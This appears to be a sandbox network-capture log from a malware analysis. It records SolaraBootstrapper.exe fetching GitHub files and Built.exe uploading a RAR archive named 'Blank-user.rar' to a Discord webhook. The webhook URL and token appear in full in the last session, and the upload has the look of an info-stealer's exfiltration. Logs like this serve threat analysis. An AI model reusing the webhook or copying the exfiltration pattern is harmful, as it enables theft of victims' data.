2024-08-05 12:32:07 UTC	1370	IN	Data Raw: 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 37 39 62 63 61 37 31 34 35 33 39 33 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 2d 66 65 34 31 33 37 62 35 34 62 32 36 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 22 Data Ascii: igh_contrast-79bca7145393.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.css" /><link data-color-theme="dark_tritanopia"
2024-08-05 12:32:07 UTC	1370	IN	Data Raw: 22 2c 22 68 6f 76 65 72 63 61 72 64 5f 61 63 63 65 73 73 69 62 69 6c 69 74 79 22 2c 22 68 6f 76 65 72 63 61 72 64 5f 6c 6f 6e 67 65 72 5f 61 63 74 69 76 61 74 65 5f 74 69 6d 65 6f 75 74 22 2c 22 6d 61 72 6b 65 74 69 6e 67 5f 70 61 67 65 73 5f 73 65 61 72 63 68 5f 65 78 70 6c 6f 72 65 5f 70 72 6f 76 69 64 65 72 22 2c 22 72 65 6d 6f 76 65 5f 63 68 69 6c 64 5f 70 61 74 63 68 22 2c 22 73 61 6d 70 6c 65 5f 6e 65 74 77 6f 72 6b 5f 63 6f 6e 6e 5f 74 79 70 65 22 2c 22 73 69 74 65 5f 6d 65 74 65 72 65 64 5f 62 69 6c 6c 69 6e 67 5f 75 70 64 61 74 65 22 2c 22 74 75 72 62 6f 5f 65 78 70 65 72 69 6d 65 6e 74 5f 72 69 73 6b 79 22 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 Data Ascii: ","hovercard_accessibility","hovercard_longer_activate_timeout","marketing_pages_search_explore_provider","remove_child_patch","sample_network_conn_type","site_metered_billing_update","turbo_experiment_risky"]}</script><script crossorigin="anonymous" def
2024-08-05 12:32:07 UTC	282	IN	Data Raw: 2d 66 36 39 30 66 64 39 61 65 33 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 66 6f 63 75 73 2d 7a 6f 6e 65 5f 6a 73 2d 63 39 30 38 36 61 34 66 62 36 32 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e Data Ascii: -f690fd9ae3d5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-c9086a4fb62b.js"></script><script crossorigin
2024-08-05 12:32:07 UTC	1370	IN	Data Raw: 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6c 61 74 69 76 65 2d 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 66 39 62 39 35 38 66 35 66 32 64 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 Data Ascii: type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-f9b958f5f2df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://g
2024-08-05 12:32:07 UTC	1370	IN	Data Raw: 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 76 69 65 77 2d 63 6f 2d 31 35 63 64 66 61 2d 33 30 37 37 64 62 61 61 66 63 33 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 Data Ascii: cript crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-15cdfa-3077dbaafc30.js"></script><script c
2024-08-05 12:32:07 UTC	1370	IN	Data Raw: 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6c 69 74 2d 68 74 6d 6c 5f 6c 69 74 2d 68 74 6d 6c 5f 6a 73 2d 63 65 37 32 32 35 61 33 30 34 63 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 Data Ascii: pplication/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets
2024-08-05 12:32:07 UTC	1370	IN	Data Raw: 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 35 33 62 34 32 33 65 64 65 33 32 61 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 Data Ascii: ub.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-53b423ede32a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.github

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	185.199.108.133	443	7248	C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-05 12:32:07 UTC	135	OUT	GET /quivings/Solara/main/Storage/version.txt HTTP/1.1 User-Agent: Solara Host: raw.githubusercontent.com Connection: Keep-Alive
2024-08-05 12:32:08 UTC	797	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 14 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block Content-Type: text/plain; charset=utf-8 X-GitHub-Request-Id: B090:27A6E7:1689912:191F432:66B0C646 Accept-Ranges: bytes Date: Mon, 05 Aug 2024 12:32:08 GMT Via: 1.1 varnish X-Served-By: cache-ewr18173-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1722861128.013060,VS0,VE9 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: d42a565218eb15c8bad48e7c7ffb3796b47dc347 Expires: Mon, 05 Aug 2024 12:37:08 GMT Source-Age: 0
2024-08-05 12:32:08 UTC	14	IN	Data Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	140.82.121.4	443	7248	C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-05 12:32:08 UTC	81	OUT	GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1 Host: github.com
2024-08-05 12:32:09 UTC	473	IN	HTTP/1.1 404 Not Found Server: GitHub.com Date: Mon, 05 Aug 2024 12:32:06 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
2024-08-05 12:32:09 UTC	3188	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
2024-08-05 12:32:09 UTC	449	IN	Data Raw: 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 Data Ascii: <!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-prefetch"
2024-08-05 12:32:09 UTC	1370	IN	Data Raw: 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 20 20 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 Data Ascii: rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous"
2024-08-05 12:32:09 UTC	1370	IN	Data Raw: 73 74 2d 37 39 62 63 61 37 31 34 35 33 39 33 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 2d 66 65 34 31 33 37 62 35 34 62 32 36 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 Data Ascii: st-79bca7145393.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.css" /><link data-color-theme="dark_tritanopia" crossorig
2024-08-05 12:32:09 UTC	1370	IN	Data Raw: 72 64 5f 61 63 63 65 73 73 69 62 69 6c 69 74 79 22 2c 22 68 6f 76 65 72 63 61 72 64 5f 6c 6f 6e 67 65 72 5f 61 63 74 69 76 61 74 65 5f 74 69 6d 65 6f 75 74 22 2c 22 6d 61 72 6b 65 74 69 6e 67 5f 70 61 67 65 73 5f 73 65 61 72 63 68 5f 65 78 70 6c 6f 72 65 5f 70 72 6f 76 69 64 65 72 22 2c 22 72 65 6d 6f 76 65 5f 63 68 69 6c 64 5f 70 61 74 63 68 22 2c 22 73 61 6d 70 6c 65 5f 6e 65 74 77 6f 72 6b 5f 63 6f 6e 6e 5f 74 79 70 65 22 2c 22 73 69 74 65 5f 6d 65 74 65 72 65 64 5f 62 69 6c 6c 69 6e 67 5f 75 70 64 61 74 65 22 2c 22 74 75 72 62 6f 5f 65 78 70 65 72 69 6d 65 6e 74 5f 72 69 73 6b 79 22 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 Data Ascii: rd_accessibility","hovercard_longer_activate_timeout","marketing_pages_search_explore_provider","remove_child_patch","sample_network_conn_type","site_metered_billing_update","turbo_experiment_risky"]}</script><script crossorigin="anonymous" defer="defer"
2024-08-05 12:32:09 UTC	1370	IN	Data Raw: 33 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 66 6f 63 75 73 2d 7a 6f 6e 65 5f 6a 73 2d 63 39 30 38 36 61 34 66 62 36 32 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 Data Ascii: 3d5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-c9086a4fb62b.js"></script><script crossorigin="anonymou
2024-08-05 12:32:09 UTC	1370	IN	Data Raw: 34 38 66 66 30 34 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 2d 65 6c 65 6d 65 6e 74 5f 2d 37 38 32 63 61 35 2d 35 34 37 36 33 63 64 35 35 62 39 36 Data Ascii: 48ff048.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_clipboard-copy-element_-782ca5-54763cd55b96
2024-08-05 12:32:09 UTC	1370	IN	Data Raw: 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 62 72 61 69 6e 74 72 65 65 5f 62 72 6f 77 73 65 72 2d 64 65 74 65 63 74 69 6f 6e 5f 64 69 73 74 5f 62 72 6f 77 73 65 72 2d 64 65 74 65 63 74 69 6f 6e 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 2d 36 38 38 33 35 64 2d 61 31 38 32 32 30 66 31 64 62 38 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 Data Ascii: s" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_stack-68835d-a18220f1db8d.js"></script><script crossorigin="anonymous" defe
2024-08-05 12:32:09 UTC	1370	IN	Data Raw: 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 6f 6c 6f 72 2d 63 6f 6e 76 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 30 65 30 37 63 63 31 38 33 65 65 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 Data Ascii: sorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript"
2024-08-05 12:32:09 UTC	1370	IN	Data Raw: 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 73 74 69 63 6b 79 2d 73 63 72 6f 6c 6c 2d 69 6e 74 6f 2d 76 69 65 77 5f 74 73 2d 37 38 63 65 31 63 38 37 38 32 66 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 Data Ascii: ript crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-78ce1c8782f5.js"></script><script crossorigin="anonymous" defer="defer" type="applic

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	162.159.135.233	443	6252	C:\Users\user\AppData\Local\Temp\Built.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-05 12:32:36 UTC	305	OUT	POST /api/webhooks/1255594789861195827/8s6rt3E8edVCsvsaavUpcA9mRxd3KM7eS7ju4bkPhLPkUvlnCQyyUrBISoboFGoSAAiq HTTP/1.1 Host: discordapp.com Accept-Encoding: identity Content-Length: 688920 User-Agent: python-urllib3/2.2.2 Content-Type: multipart/form-data; boundary=0e3213dce644b7bfaf68d16c9fe0b5b3
2024-08-05 12:32:36 UTC	16384	OUT	Data Raw: 2d 2d 30 65 33 32 31 33 64 63 65 36 34 34 62 37 62 66 61 66 36 38 64 31 36 63 39 66 65 30 62 35 62 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 cf e2 c0 8f 21 04 00 00 01 0f 3b 87 9b 39 8e 76 9e be 1d b1 bb 12 0a 52 70 54 66 85 b3 4c 94 59 f2 4c 30 78 ff ac 80 ff 23 75 7e e4 38 f3 0e 3b 2d 9e 17 32 79 82 2c 46 5d 72 c4 43 d2 60 a2 7a 1b ac 8d 62 a2 c2 be 3a 6a 24 c5 4b 0e 1d 2c e9 8e aa b3 a0 73 f0 f3 77 61 f2 10 e8 56 66 70 1b Data Ascii: --0e3213dce644b7bfaf68d16c9fe0b5b3Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!;9vRpTfLYL0x#u~8;-2y,F]rC`zb:j$K,swaVfp
